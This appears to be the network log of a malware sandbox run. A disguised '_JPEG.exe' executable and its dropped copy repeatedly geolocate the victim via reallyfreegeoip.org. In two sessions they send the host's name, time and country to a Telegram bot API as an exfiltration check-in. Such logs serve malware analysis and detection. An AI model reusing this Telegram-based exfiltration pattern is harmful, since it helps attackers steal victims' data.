Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
8          | 192.168.2.4 | 49752       | 188.114.97.3   | 443              | 1260 | C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-25 07:18:12 UTC | 63  | OUT | GET /xml/173.254.250.81 HTTP/1.1
    Host: reallyfreegeoip.org
2024-10-25 07:18:12 UTC | 901 | IN  | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 07:18:12 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 368
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GWZGtAQIgj%2B97LmWwa%2BGppBRXgKraM7Cc9WpWfHfubZfAuofH28%2Bb%2BRS4IN8lSc3z%2FfQxRigqvzc%2BKyYO3%2B5tbXoEcvzd34Oo7VHCQY18jISm5Hfe0%2BPEQx3ow2dokzM2nsfZ6bt"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e679b3fddaf-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1231&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2360228&cwnd=32&unsent_bytes=0&cid=b29ab0b1a77c9936&ts=146&x=0"
2024-10-25 07:18:12 UTC | 366 | IN  | Data Raw: (hex dump omitted)
    Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:12 UTC | 5   | IN  | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
9          | 192.168.2.4 | 49755       | 188.114.97.3   | 443              | 7448 | C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-25 07:18:13 UTC | 87  | OUT | GET /xml/173.254.250.81 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-10-25 07:18:14 UTC | 890 | IN  | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 07:18:13 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 369
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aFXEiZ4vUllQSDESPFjf4cXmSjgcE1kn7kmj8Px%2B06pXzEVY5Cw89sufammr80NxJjirxHt9y9AhDdRPuKZSPLXrU43yBFczoKl7zUOOyDH01%2F4iU6bPuZ3E8s64XIxQ3Vx2TfjB"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e713a9e4859-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1159&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2448013&cwnd=244&unsent_bytes=0&cid=9ae1a1cf9cd084dc&ts=298&x=0"
2024-10-25 07:18:14 UTC | 366 | IN  | Data Raw: (hex dump omitted)
    Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:14 UTC | 5   | IN  | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
10         | 192.168.2.4 | 49756       | 188.114.97.3   | 443              | 1260 | C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-25 07:18:14 UTC | 87  | OUT | GET /xml/173.254.250.81 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-10-25 07:18:14 UTC | 888 | IN  | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 07:18:14 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 370
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IRCqsyAYcHWlVg9Y1w8fp7qJu554I2rtOJsInUZQDFNEbLGCAKPzvXT93HH9C0PCtNK9ZTpKp7mmfHSrPAyharpXHvN7fJ1LQY712G6CXse%2BHnARmVlKD4t5lB6AkECGe8Y1FtkJ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e752ec7ea80-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1103&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2520452&cwnd=248&unsent_bytes=0&cid=ba7ea7d07f633af7&ts=153&x=0"
2024-10-25 07:18:14 UTC | 366 | IN  | Data Raw: (hex dump omitted)
    Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:14 UTC | 5   | IN  | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
11         | 192.168.2.4 | 49759       | 188.114.97.3   | 443              | 7448 | C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-25 07:18:15 UTC | 87  | OUT | GET /xml/173.254.250.81 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-10-25 07:18:16 UTC | 892 | IN  | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 07:18:15 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 371
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zPOAooMnd6dcZj%2F5g4dYj930LsC5ZYFSjNooUFxXE1NMhLBfaNxSafVLGx19xV1XbzN4sQcdwEt4Ow4e6xUfg75MjWxf7GXNsnf%2FhNh7u%2BbeztfzaczOeL5fnzIVm41LNj6x1lqq"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e7dcad2e9b1-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2498&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1155165&cwnd=241&unsent_bytes=0&cid=435285e94817bd3d&ts=150&x=0"
2024-10-25 07:18:16 UTC | 366 | IN  | Data Raw: (hex dump omitted)
    Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:16 UTC | 5   | IN  | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
12         | 192.168.2.4 | 49761       | 188.114.97.3   | 443              | 1260 | C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-25 07:18:16 UTC | 63  | OUT | GET /xml/173.254.250.81 HTTP/1.1
    Host: reallyfreegeoip.org
2024-10-25 07:18:16 UTC | 894 | IN  | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 07:18:16 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 372
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ZdXhcel2Pi3EsUhWTUtLmKj%2FHWlckn6iFYBIOd0L7wjNd%2BCeFWtHrFwfmEUUM9WUbci8ygCC1M75Pa5pkv%2FZyeTJvEWNb%2BT6yTLdFDO4PQ0s41NOzykrG29eMQ0OFct5FqE6DwG"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e820cd76b0b-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1758&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1661503&cwnd=251&unsent_bytes=0&cid=db0d3f7751c7b4c7&ts=152&x=0"
2024-10-25 07:18:16 UTC | 366 | IN  | Data Raw: (hex dump omitted)
    Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:16 UTC | 5   | IN  | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
13         | 192.168.2.4 | 49764       | 188.114.97.3   | 443              | 7448 | C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-25 07:18:17 UTC | 87  | OUT | GET /xml/173.254.250.81 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-10-25 07:18:17 UTC | 906 | IN  | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 07:18:17 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 373
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sqM%2BAHA8RsIHZDRkpoYSiZejlvCW0ydhooyknZvYJN%2BagNv4Ie2Kg%2BL6cn%2BIIpLn%2BDIH8mXouAn70JuMXy6pUDBFqwxL1ge6ab1YYN%2BFwc5e%2B8n2evai%2F3yvOGn1GJ%2Fe%2BihfVBdS"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e86ba76ddad-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1212&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2311252&cwnd=175&unsent_bytes=0&cid=a9a73524fa8bb71e&ts=147&x=0"
2024-10-25 07:18:17 UTC | 366 | IN  | Data Raw: (hex dump omitted)
    Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:18:17 UTC | 5   | IN  | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
14         | 192.168.2.4 | 49767       | 188.114.97.3   | 443              | 1260 | C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe

Timestamp               | Bytes transferred | Direction | Data
2024-10-25 07:18:18 UTC | 63  | OUT | GET /xml/173.254.250.81 HTTP/1.1
    Host: reallyfreegeoip.org
2024-10-25 07:18:18 UTC | 894 | IN  | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 07:18:18 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 374
    Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XvenkQNQc2PGLvbfzNrrOytasmdZwJqRu1p0U45%2FeC3C2QQXoc4p7EThc%2FFfQBt6RUbDyysaM5a9SDfx7zOT%2FwKLZIV6Oj6iMAn7XMzIcsOJpnj8A2irWWyAE%2FEGNqVxKhHQllIY"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d806e8b6f670072-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1351&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2048090&cwnd=251&unsent_bytes=0&cid=fb086a492514ed51&ts=153&x=0"
                                                                                                      2024-10-25 07:18:18 UTC  366                IN         Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:18 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                      15          192.168.2.4  49771        188.114.97.3     443               7448  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                      2024-10-25 07:18:19 UTC  63                 OUT        GET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-25 07:18:19 UTC  896                IN         HTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:19 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 375
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AIowmj4otZoZnb%2FbMRGdzWoo%2FRUNwMvzVik9qRgHS7a9dilLHDPSmhWPAJujOgr61Ol0D46dMh6aUEcuEHdEfKEyPZp4cCK5L4hyl8ZE3n6%2BS92VnHWmR1a%2FVyWg5LoqVAPTGH%2FE"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e916e01e9ca-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1135&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2490111&cwnd=249&unsent_bytes=0&cid=4db768bb56d32cf6&ts=153&x=0"
                                                                                                      2024-10-25 07:18:19 UTC  366                IN         Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:19 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                      16          192.168.2.4  49770        149.154.167.220  443               1260  C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                      2024-10-25 07:18:19 UTC  345                OUT        GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:19:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1
                                                                                                      Host: api.telegram.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-25 07:18:19 UTC  344                IN         HTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.18.0
                                                                                                      Date: Fri, 25 Oct 2024 07:18:19 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Content-Length: 55
                                                                                                      Connection: close
                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                      2024-10-25 07:18:19 UTC  55                 IN         Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                      17          192.168.2.4  49775        188.114.97.3     443               7448  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                      2024-10-25 07:18:21 UTC  63                 OUT        GET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-25 07:18:21 UTC  896                IN         HTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:21 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 377
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Id2EZ7hhfX78YC0Qz2SvQYhOUHhOev4%2F%2B7i9ud18wrpVBbAGI9nnarcdpvYBuOCawJqMSSn0l01hu%2BVyYpfZG8dn3IqH%2BeTWDfcCgPb8RmW1yemPaYElKg1d0U%2BZG10KUtd9MtL"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806ea11e192cba-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1460&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2421404&cwnd=242&unsent_bytes=0&cid=5bb8b97d0aebc815&ts=160&x=0"
                                                                                                      2024-10-25 07:18:21 UTC  366                IN         Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:21 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                      18          192.168.2.4  49777        188.114.97.3     443               7448  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                      2024-10-25 07:18:22 UTC  87                 OUT        GET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-25 07:18:23 UTC  890                IN         HTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:23 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 379
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2FR5qEatYF1SAQAiqtCc88vml7LyH07RTdc2LMQdTAPKSbNfTBOMHDbfMI8e6%2B2SDZ80dYqffsyeDOrT7PyE77U2PEzEzkOlhF7cuFTq06aBE30xcUivpCAfPbRxzoc1ZDHgEgnc"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806eaa0a1e2d41-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1372&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2049539&cwnd=251&unsent_bytes=0&cid=4b1b430b4f023819&ts=152&x=0"
                                                                                                      2024-10-25 07:18:23 UTC  366                IN         Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:23 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                      19          192.168.2.4  49778        149.154.167.220  443               7448  C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                      2024-10-25 07:18:24 UTC  345                OUT        GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2020:37:54%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1
                                                                                                      Host: api.telegram.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-25 07:18:24 UTC  344                IN         HTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.18.0
                                                                                                      Date: Fri, 25 Oct 2024 07:18:24 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Content-Length: 55
                                                                                                      Connection: close
                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                      2024-10-25 07:18:24 UTC  55                 IN         Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                      Timestamp                             Source Port  Dest Port  Source IP      Dest IP        Commands
